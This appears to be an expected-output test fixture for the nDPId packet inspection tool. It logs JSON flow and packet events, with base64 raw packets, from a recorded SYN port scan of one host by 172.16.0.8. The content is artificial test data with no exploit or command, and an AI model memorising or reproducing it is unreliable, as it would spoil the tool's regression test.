-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":844,"source":"synscan.pcap","alias":"nDPId-test","flow_id":835,"flow_packet_id":1,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059785,"pkt":"ACYLMQczACWzv5HuCABFAAAs6SIAADMGLFCsEAAIQA2GNIzSFKDdUoMYAAAAAGACEAAT7wAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":845,"source":"synscan.pcap","alias":"nDPId-test","flow_id":836,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059785,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1066,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":845,"source":"synscan.pcap","alias":"nDPId-test","flow_id":836,"flow_packet_id":1,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059785,"pkt":"ACYLMQczACWzv5HuCABFAAAscgsAACUGsWesEAAIQA2GNIzSBCrdUoMYAAAAAGACCAAsZQAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":846,"source":"synscan.pcap","alias":"nDPId-test","flow_id":837,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059785,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":481,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":846,"source":"synscan.pcap","alias":"nDPId-test","flow_id":837,"flow_packet_id":1,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059785,"pkt":"ACYLMQczACWzv5HuCABFAAAsat0AADsGopWsEAAIQA2GNIzSAeHdUoMYAAAAAGACEAAmrgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":847,"source":"synscan.pcap","alias":"nDPId-test","flow_id":838,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059786,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5901,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":847,"source":"synscan.pcap","alias":"nDPId-test","flow_id":838,"flow_packet_id":1,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059786,"pkt":"ACYLMQczACWzv5HuCABFAAAsU+kAACgGzImsEAAIQA2GNIzSFw3dUoMYAAAAAGACBAAdggAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":848,"source":"synscan.pcap","alias":"nDPId-test","flow_id":839,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059786,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":848,"source":"synscan.pcap","alias":"nDPId-test","flow_id":839,"flow_packet_id":1,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059786,"pkt":"ACYLMQczACWzv5HuCABFAAAsfg8AADcGk2OsEAAIQA2GNIzSH2rdUoMYAAAAAGACEAAJJQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":849,"source":"synscan.pcap","alias":"nDPId-test","flow_id":840,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059786,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2967,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":849,"source":"synscan.pcap","alias":"nDPId-test","flow_id":840,"flow_packet_id":1,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059786,"pkt":"ACYLMQczACWzv5HuCABFAAAsRK4AADsGyMSsEAAIQA2GNIzSC5fdUoMYAAAAAGACEAAc+AAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":850,"source":"synscan.pcap","alias":"nDPId-test","flow_id":841,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059786,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":850,"source":"synscan.pcap","alias":"nDPId-test","flow_id":841,"flow_packet_id":1,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059786,"pkt":"ACYLMQczACWzv5HuCABFAAAsOd4AADMG25SsEAAIQA2GNIzSAATdUoMYAAAAAGACEAAoiwAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":851,"source":"synscan.pcap","alias":"nDPId-test","flow_id":842,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059786,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1082,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":851,"source":"synscan.pcap","alias":"nDPId-test","flow_id":842,"flow_packet_id":1,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059786,"pkt":"ACYLMQczACWzv5HuCABFAAAsgJQAADUGkt6sEAAIQA2GNIzSBDrdUoMYAAAAAGACCAAsVQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":852,"source":"synscan.pcap","alias":"nDPId-test","flow_id":843,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059786,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1521,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":852,"source":"synscan.pcap","alias":"nDPId-test","flow_id":843,"flow_packet_id":1,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059786,"pkt":"ACYLMQczACWzv5HuCABFAAAsftgAACcGopqsEAAIQA2GNIzSBfHdUoMYAAAAAGACEAAingAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":853,"source":"synscan.pcap","alias":"nDPId-test","flow_id":844,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059786,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":853,"source":"synscan.pcap","alias":"nDPId-test","flow_id":844,"flow_packet_id":1,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059786,"pkt":"ACYLMQczACWzv5HuCABFAAAsN+EAACYG6pGsEAAIQA2GNIzSCDTdUoMYAAAAAGACDAAkWwAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":854,"source":"synscan.pcap","alias":"nDPId-test","flow_id":845,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059786,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":854,"source":"synscan.pcap","alias":"nDPId-test","flow_id":845,"flow_packet_id":1,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059786,"pkt":"ACYLMQczACWzv5HuCABFAAAsqgcAADcGZ2usEAAIQA2GNIzSA+ndUoMYAAAAAGACEAAkpgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":855,"source":"synscan.pcap","alias":"nDPId-test","flow_id":846,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059786,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8090,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":855,"source":"synscan.pcap","alias":"nDPId-test","flow_id":846,"flow_packet_id":1,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059786,"pkt":"ACYLMQczACWzv5HuCABFAAAsDusAACwGDYisEAAIQA2GNIzSH5rdUoMYAAAAAGACBAAU9QAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":856,"source":"synscan.pcap","alias":"nDPId-test","flow_id":847,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059786,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1914,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":856,"source":"synscan.pcap","alias":"nDPId-test","flow_id":847,"flow_packet_id":1,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059786,"pkt":"ACYLMQczACWzv5HuCABFAAAsCKQAADQGC8+sEAAIQA2GNIzSB3rdUoMYAAAAAGACBAAtFQAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":857,"source":"synscan.pcap","alias":"nDPId-test","flow_id":848,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059786,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7937,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":857,"source":"synscan.pcap","alias":"nDPId-test","flow_id":848,"flow_packet_id":1,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059786,"pkt":"ACYLMQczACWzv5HuCABFAAAsNx4AACgG6VSsEAAIQA2GNIzSHwHdUoMYAAAAAGACBAAVjgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":858,"source":"synscan.pcap","alias":"nDPId-test","flow_id":849,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":858,"source":"synscan.pcap","alias":"nDPId-test","flow_id":849,"flow_packet_id":1,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059845,"pkt":"ACYLMQczACWzv5HuCABFAAAsdyIAADIGn1CsEAAIQA2GNIzTC77dU4MZAAAAAGACDAAgzgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":859,"source":"synscan.pcap","alias":"nDPId-test","flow_id":850,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3168,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":859,"source":"synscan.pcap","alias":"nDPId-test","flow_id":850,"flow_packet_id":1,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059845,"pkt":"ACYLMQczACWzv5HuCABFAAAsqZ8AADkGZdOsEAAIQA2GNIzTDGDdU4MZAAAAAGACCAAkLAAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":860,"source":"synscan.pcap","alias":"nDPId-test","flow_id":851,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":860,"source":"synscan.pcap","alias":"nDPId-test","flow_id":851,"flow_packet_id":1,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059845,"pkt":"ACYLMQczACWzv5HuCABFAAAsJ+QAAC0G846sEAAIQA2GNIzTFlbdU4MZAAAAAGACCAAaNgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":861,"source":"synscan.pcap","alias":"nDPId-test","flow_id":852,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":861,"source":"synscan.pcap","alias":"nDPId-test","flow_id":852,"flow_packet_id":1,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059845,"pkt":"ACYLMQczACWzv5HuCABFAAAstxwAADEGYFasEAAIQA2GNIzTJxrdU4MZAAAAAGACCAAJcgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":862,"source":"synscan.pcap","alias":"nDPId-test","flow_id":853,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49154,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":862,"source":"synscan.pcap","alias":"nDPId-test","flow_id":853,"flow_packet_id":1,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059845,"pkt":"ACYLMQczACWzv5HuCABFAAAsWJwAADUGutasEAAIQA2GNIzTwALdU4MZAAAAAGACCABwiQAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":863,"source":"synscan.pcap","alias":"nDPId-test","flow_id":854,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":17988,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":863,"source":"synscan.pcap","alias":"nDPId-test","flow_id":854,"flow_packet_id":1,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059845,"pkt":"ACYLMQczACWzv5HuCABFAAAspbMAADUGbb+sEAAIQA2GNIzTRkTdU4MZAAAAAGACCADqRwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":864,"source":"synscan.pcap","alias":"nDPId-test","flow_id":855,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":864,"source":"synscan.pcap","alias":"nDPId-test","flow_id":855,"flow_packet_id":1,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059845,"pkt":"ACYLMQczACWzv5HuCABFAAAszIwAADAGS+asEAAIQA2GNIzTDtndU4MZAAAAAGACBAAlswAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":865,"source":"synscan.pcap","alias":"nDPId-test","flow_id":856,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":84,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":865,"source":"synscan.pcap","alias":"nDPId-test","flow_id":856,"flow_packet_id":1,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059845,"pkt":"ACYLMQczACWzv5HuCABFAAAsOLAAADEG3sKsEAAIQA2GNIzTAFTdU4MZAAAAAGACCAAwOAAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":866,"source":"synscan.pcap","alias":"nDPId-test","flow_id":857,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3878,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":866,"source":"synscan.pcap","alias":"nDPId-test","flow_id":857,"flow_packet_id":1,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059845,"pkt":"ACYLMQczACWzv5HuCABFAAAs7mkAADAGKgmsEAAIQA2GNIzTDybdU4MZAAAAAGACBAAlZgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":867,"source":"synscan.pcap","alias":"nDPId-test","flow_id":858,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9485,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":867,"source":"synscan.pcap","alias":"nDPId-test","flow_id":858,"flow_packet_id":1,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059845,"pkt":"ACYLMQczACWzv5HuCABFAAAs2sEAAC4GP7GsEAAIQA2GNIzTJQ3dU4MZAAAAAGACDAAHfwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":868,"source":"synscan.pcap","alias":"nDPId-test","flow_id":859,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":868,"source":"synscan.pcap","alias":"nDPId-test","flow_id":859,"flow_packet_id":1,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059845,"pkt":"ACYLMQczACWzv5HuCABFAAAsGVoAACcGCBmsEAAIQA2GNIzTJw\/dU4MZAAAAAGACEAABfQAAAgQFtA=="} 
